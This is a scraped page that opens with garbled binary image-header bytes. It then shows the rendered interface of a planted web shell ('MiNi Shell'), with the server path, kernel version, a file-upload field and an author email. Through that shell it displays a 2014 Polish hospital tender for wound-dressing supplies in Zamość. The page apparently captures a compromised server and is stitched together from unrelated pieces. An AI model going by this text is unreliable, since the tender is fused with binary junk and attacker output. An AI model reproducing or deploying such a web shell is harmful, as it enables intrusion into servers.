JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140806/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140806/262512-N-2014.html

<p class="kh_header"><b>Zamość: Dostawa materiałów opatrunkowych</b><br>
<b>Numer ogłoszenia: 262512 - 2014; data zamieszczenia: 06.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Szpital Wojewódzki im. Papieża Jana Pawła II , Aleje Jana Pawła II 10, 22-400 Zamość, woj. lubelskie, tel. 084 6773333, faks 084 6386669.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.zam.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów opatrunkowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa materiałów opatrunkowych. Przedmiot zamówienia został podzielony na 29 zadań. Zadanie 1
1.Taśma elastyczna włókninowa samoprzylepna w rolkach o długości 5-10m
szerokość 5 cm - 20 000 m
szerokość 10 cm - 16 000 m
szerokość 15 cm - 7 000 m
szerokość 20 cm - 500 m
2.Hypoalergiczny przylepiec na włókninie w rolkach o długości 5-10 m
szerokość 12,5 mm - 14 000 m
szerokość 25 mm - 8 000  m
3.Przylepiec na jedwabiu w rolkach o długości 5-10 m
szerokość 12,5 mm - 10 000  m
szerokość 25mm - 6 000 m
4.Przylepiec na tkaninie w rolkach o długości 5-10m
szerokość 12,5 mm - 12 000 m
szerokość 25 mm - 13 000 m

Zadanie 2
1.Sterylny, hipoalergiczny opatrunek włókninowy do mocowania kaniul obwodowych z klejem akrylowym o dobrej adhezji. Rozmiar 6 cm x 8 cm - 200 000 szt.

Zadanie 3
1.Sterylny, hipoalergiczny opatrunek do mocowania kaniul obwodowych, wykonany z cienkiej wytrzymałej mechanicznie wodoszczelnej błony z klejem zapewniającym wysoką i długotrwałą przylepność. Rozmiar 5 cm x 5,7 cm - 1 800 szt.

Zadanie 4
1.Sterylny, hipoalergiczny opatrunek z przezroczystej folii poliuretanowej do mocowania wkłuć centralnych, z ramką pozwalającą na pewne zamocowanie cewnika. Kształt owalny. Rozmiar 10 x12 cm - 3 000 szt.

Zadanie 5
1.Sterylny opatrunek do zabezpieczenia portów naczyniowych wykonany z przezroczystej folii poliuretanowej, wodoodporny, z klejem hypoalergicznym, przepuszczający parę wodną i tlen. Rozmiar 12 cm x 14 cm - 100 szt.

Zadanie 6
1.Opaska podtrzymująca dziana:
Rozmiar:
4m x 5 cm - 10 000 szt.
4m x 10 cm - 30 000 szt.
4 m x 15 cm - 14 000 szt.

Zadanie 7
1.Opaska elastyczna z zapinką 5 m x15 cm w naprężeniu z lycrą - 12 000 szt.

Zadanie 8
Wata opatrunkowa bawełniano - wiskozowa 200g x 1 szt. -  700 szt.

Zadanie 9
1. Kompresy włókninowe niesterylne 4W 5 x 5 cm a 100 szt. - 14 500 op.
2. Kompresy włókninowe niesterylne 4W 7,5 x 7,5 cm a 100 szt. - 15 000 op.

Zadanie 10
1.Kompresy gazowe, niesterylne, starannie wykończone, bez wystających luźnych nitek i strzępków, o brzegach podwiniętych (składanych do wewnątrz), z przeznaczeniem do celów inwazyjnych chirurgicznie i nieinwazyjnych,  
Rozmiar 5cm x 5 cm a 100 szt. 8W 13N - 18 000 op.
Rozmiar 7,5 cm x,5cm a 100 szt. 8W 13N -14 000 op.
Rozmiar 10cm x 10cm a 100 szt. 8 W 13N - 15 000 op.

Zadanie 11
1.Podkład syntetyczny pod gips
Rozmiar 3m x 12,5 cm (+  -10%) x 1szt. - 300 szt.
2.Bandaż gipsowy szybkowiążący ( do 3 min.)
Rozmiar 3m x 12,5 cm (+  -10%) x 1 szt. - 300 szt.

Zadanie 12
Gaza opatrunkowa składana - szerokość 90 cm x 1 m (+  -10 %) - 160 000 m.

Zadanie 13
Lignina płaty (op. 5 kg) - 1 800 op.

Zadanie 14 
1.Serweta operacyjna  niejałowa, gazowa 4W 17N 30x30  cm (+  - 5 cm) - 54 000 szt.               
2.Serweta operacyjna  niejałowa, gazowa 4 W 17N z tasiemką 50x50 cm (+  -5 cm) -    14  000 szt.
3.Serweta operacyjna  niejałowa, gazowa z tasiemką 4W 17 N 75x 90 cm (+  - 5 cm) - 9  000    szt.        
4.Serweta operacyjna niejałowa, gazowa z nitką Rtg 4W 17N 75x 90 cm (+ - 5 cm) - 1 000 szt.

 Zadanie 15
1.Serweta operacyjna gazowa, sterylna 4W 17N 30 x 30 cm a 2 szt. z nitką Rtg  -  20 000 op.
2.Serweta operacyjna, gazowa, sterylna 8W 17 nitkowa z tasiemką 100 cm x 10cm  a  2szt. - 400 op.    

Zadanie 16
1.Setony gazowe, jałowe 4W 17N (5 cm x 2m)  a 20szt. - 1 200 op.

Zadanie 17
1.Tupfer gazowy, niesterylny 17N (fasolka 15 cm x 15 cm) a 500 szt. -  9 op.
2.Tupfer gazowy, niesterylny 17N (rożek 18 x 18 cm) a 200 szt. - 15 op.   
3.Seton gazowy, niejałowy  4W 17N (1 cm x 2 m) a 200 szt. - 4 op.
4.Seton gazowy, niejałowy  4W 17N (2cm x 2m) a 120 szt. -  10 op.


Zadanie 18
1.Opatrunek hydrokoloidowy, wodoodporny, dwuwarstwowy, stosowany do leczenia  odleżyn z umiarkowanym  wysiękiem. Rozmiar minimum 10 cm x 10 cm. - 500 szt.

Zadanie 19
1.Opatrunek do leczenia przewlekłych odleżyn zawierający srebro o dużych właściwościach bakteriobójczych. Rozmiar minimum 10 cm x 10cm - 500 szt.

Zadanie 20
1.Opatrunek hydrożelowy o właściwościach  oczyszczających i rozpuszczających tkankę martwiczą. Rozmiar minimum 10 cm x 10 cm -300 szt.

Zadanie 21
1.Opatrunek alginianowy stosowany na ranę odleżynową z dużym wysiękiem oraz na rany krwawiące. Rozmiar minimum 10 cm x 10 cm - 400 szt.

Zadanie 22
Sterylny, paroprzepuszczalny, transparentny  opatrunek z folii poliuretanowej. Do stosowania  na rany jako ochrona skóry, oraz jako opatrunek  wtórny. 
1.Rozmiar minimum: 10 x 12 cm - 400 szt., 
2.Rozmiar minimum: 20 x 15 cm - 400 szt.

Zadanie 23
1.Opatrunek  gazowy parafinowy zawierający 0,5 % octan chlorheksydyny. Rozmiar minimum 10 cm x 10 cm - 400 szt.

Zadanie 24
1.Opatrunek gazowy parafinowy. Rozmiar minimum 10 cm x 10 cm - 600 szt.

Zadanie 25
1.Podkładka pod rurkę tracheostomijną, sterylna, z przecięciem i otworem na rurkę, wymiary minimum 8 x 9 cm, wykonana ze 100 % wiskozy. Górna warstwa kompresu pokryta warstwą aluminiową - 1 800 szt.

Zadanie 26
1.Przylepiec do stabilizacji rurki intubacyjnej i ustno - gardłowej. Skład: 2 podkładki wykonane z samoprzylepnej włókniny z warstwą rzepu na stronie wierzchniej i 1 pasek o wymiarach  16 mm x 40 cm. - 1 000 kpl.

Zadanie 27
1.Opatrunek do stabilizacji zgłębników żołądkowych dla dorosłych. Rozmiar 7 cm x 7,1 cm. - 5 000 szt.

Zadanie 28
Tampony chirurgiczne sterylne z nitką  do operacji czaszkowych i rdzeniowych. 
Wykonane ze 100 % bawełny połączone z nicią ułatwiającą sprawdzanie ich liczby. Pakowane na pojedynczych kartonikach po 10 szt. Łatwo poddające się modelowaniu, utrzymujące zadany kształt, absorbujące płyny, nie ulegające rozwarstwieniu i przyleganiu do tkanek. Posiadające  na długości tamponu znacznik widzialny w promieniach rtg. Sterylizowane w promieniach gamma lub w parze - metoda sterylizacji musi być zaznaczona na etykiecie. Produkt pakowany typ Blister. Zalecane, aby opakowania pojedyncze posiadały samoprzylepne metryczki z kontrolą jakości produktu.
Rozmiary:
15 mm x 15 mm + - 5 mm a 10 szt. - 450 op.
20 mm x 40 mm + - 5 mm a 10 szt. - 500 op.
25 mm x75 mm + - 5 mm a 10 szt. - 250 op.
20 mm x 20  mm + -5 mm a 10 szt. - 700 op.
125 mm x 75 mm + - 5 mm a 10 szt.- 300 op.

Zadanie 29
1.Opatrunki do hemodializ - 6 500 zestawów. Zestaw składa się z dwóch części. W skład jednego zestawu wchodzi:
a) zestaw do podłączenia:
- 1 serweta 60 cm x 50 cm,
- 4 gaziki 7,5 cm x 7,5 cm
- 2 cannula plast 5,8 x 8 cm
b) zestaw do odłączenia:
- 4 gaziki 7,5 cm x 7,5 cm
- 2 cannula plast 5,8 x 8 cm. 

Sterylizacja materiału gazowego parą wodną w procesie zwalidowanym zgodnym z EN ISO 17665-1:2007 w temperaturze:
- 121o C 1 atmosfera nadciśnienia, w czasie co najmniej 15 min.
- 134oC 2 atmosfery nadciśnienia, w czasie co najmniej 3 min.

Zamawiający zastrzega sobie prawo, celem weryfikacji wiarygodności danych zawartych w ofercie dotyczących przedmiotu zamówienia, do zażądania w wyznaczonym przez siebie terminie dostarczenia przez wykonawcę próbek i/lub stron katalogowych oferowanego przedmiotu zamówienia pod rygorem odrzucenia oferty. Niedostarczenie w wyznaczonym terminie próbek i/lub stron katalogowych spowoduje, że oferta nie będzie odpowiadała treści specyfikacji istotnych warunków zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 29.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Opis oferowanego przedmiotu zamówienia sporządzony dla każdego zadania oddzielnie z podaniem producenta i kraju pochodzenia oraz jego nazwy handlowej. Opis musi zawierać co najmniej dane na temat parametrów wymaganych, określonych w opisie przedmiotu zamówienia.

Deklaracja zgodności CE, certyfikat zgodności jednostki notyfikowanej dla oferowanego materiału opatrunkowego zgodnie z ustawą o wyrobach medycznych - dotyczy zadania nr: 10, 14, 15, 16, 17, 28.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferta wykonawcy (sporządzony według wzoru strona 2 i 3 SIWZ) złożony dla  każdego zadania oddzielnie.

Oferta cenowa przygotowana dla każdego zadania oddzielnie w sposób podany w specyfikacji istotnych warunków zamówienia na str. 13 i  zawierająca wszystkie elementy, o których w nim mowa.
Oświadczenie o terminie płatności za dostawy - termin płatności musi być określony w dniach. Zamawiający wymaga by termin płatności wynosił 60 dni od daty otrzymania faktury VAT - treść oświadczenia znajduje się w formularzu oferta wykonawcy  - wystarczy ją uzupełnić o oferowany termin płatności.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>3. Zamawiający dopuszcza zmiany w umowie w następujących przypadkach:
1) w przypadku zmiany danych stron,
2) w przypadku zmiany numerów katalogowych,
3) w przypadku zmiany stawki podatku VAT zmianie mogą ulec ceny brutto. Ceny netto nie mogą ulec podwyższeniu,
4) w przypadku obniżenia ceny na dany przedmiot umowy bez względu na przyczynę takiej zmiany,
5) w przypadku określonym w § 2 ust. 5 i 6 umowy tj.: 
5. Sprzedający zobowiązuje się do zapewnienia ciągłości dostaw w okresie trwania umowy. W przypadku wystąpienia okoliczności niezależnych od Sprzedającego (np. zaprzestanie produkcji, brak importu do Polski, wprowadzenie nowego asortymentu w miejsce dotychczas produkowanego), Sprzedający niezwłocznie zaproponuje Zamawiającemu zamienny wyrób o niegorszych parametrach. Cena zamiennego wyrobu (odpowiednika) nie może być wyższa od ceny wyrobu objętego niniejszą umową, z zastrzeżeniem ust. 6. 
6. W sytuacji, gdy w obrocie brak będzie wyrobów zamiennych (odpowiedników), które mogłyby być zaproponowane Kupującemu w cenach obowiązujących w niniejszej umowie, a są wyroby, których cena rynkowa w sposób znaczący jest wyższa od wyrobu objętego umową (sprzedaż w cenie z umowy groziłaby powstaniem rażącej straty u Sprzedającego), Sprzedający niezwłocznie poinformuje o tym Kupującego, załączając do pisma dokumenty na dowód istnienia takiej sytuacji. 
6) w przypadku niezrealizowania umowy pod względem ilościowym, wydłużenie jej obowiązywania maksymalnie do sześciu miesięcy licząc od daty zakończenia jej obowiązywania.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.zam.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Szpital Wojewódzki im. Papieża Jana Pawła II, Al. Jana Pawła II 10, 22 - 400 Zamość - Dział Administracyjno - Gospodarczy Zamówienia Publiczne pok. 215.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.08.2014 godzina 11:00, miejsce: Samodzielny Publiczny Szpital Wojewódzki im. Papieża Jana Pawła II, Al. Jana Pawła II 10, 22 - 400 Zamość - Kancelaria Szpitala  pok. 248.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Termin realizacji zamówienia (wymagany):
 - przedmiotu zamówienia określonego w zadaniach nr 1 - nr 28  przez okres 18 miesięcy licząc od daty zawarcia umowy;
- przedmiotu zamówienia określonego w zadaniu nr 29  do dnia 31 grudnia 2014r. licząc od daty zawarcia umowy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com